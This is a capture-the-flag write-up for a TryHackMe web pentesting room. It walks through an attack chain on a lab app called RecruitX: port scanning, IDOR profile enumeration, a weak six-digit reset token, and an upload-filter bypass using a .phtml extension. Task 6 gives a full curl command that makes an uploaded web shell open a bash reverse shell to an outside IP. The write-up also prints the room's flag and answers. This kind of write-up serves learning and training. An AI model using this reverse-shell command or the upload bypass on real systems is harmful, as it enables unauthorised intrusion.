Room: https://tryhackme.com/room/guidedpentestweb
We explore a simple web pentest scenario, learning how small issues connect together, from finding hidden pages to gaining deeper access through weak validation and poor security checks.
Task 2: Reconnaissance and Enumeration
What version of the Apache server is running?
2.4.58
Solution:
nmap -sV -sC -p- 10.48.166.24
What database service is running on the target?
mysql
Solution:
What is the path to the password reset page?
/reset.php
Solution:
Task 3: IDOR
What is the name of the administrator user?
Sarah Mitchell
Solution:
http://10.48.166.24/profile.php?id=1
What role does James Crawford hold?
hiring_manager
Solution:
http://10.48.166.24/profile.php?id=2
Task 4: Weak Password Reset
How many digits long is the reset token?
6
Solution:
After resetting the password for s.mitchell@recruitx.thm and logging in, what role is displayed for that account in the dashboard?
Administrator
Solution:
Task 5: Admin Panel Access
What is the name of the PHP file responsible for handling file upload in the RecruitX web app?
upload.php
Solution:
What HTML attribute on the file input is used to restrict selectable file extensions on the client side?
accept
Solution:
Which alternative PHP extension bypassed the upload filter?
.phtml
Solution:
Task 6: Remote Code Execution
What user is the web shell running as?
www-data
Solution:
Create a reverse shell:
subl shell.phtml
Upload it to target server:
Use the command for shell:
curl "http://10.48.166.24/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.48.83.210/4444+0>%261'"
What is the hostname of the target server?
recruitx-prod
Solution:
What is the flag?
THM{ch41n3d_vulns_4r3_d3v4st4t1ng}
Solution:
cd ubuntu/recruitx
cat flag.txt
Task 7: The Attack Chain
How many distinct vulnerabilities were chained together in this engagement?
4
What approach should be used instead of a blocklist when validating file uploads?
allowlist
That's a wrap!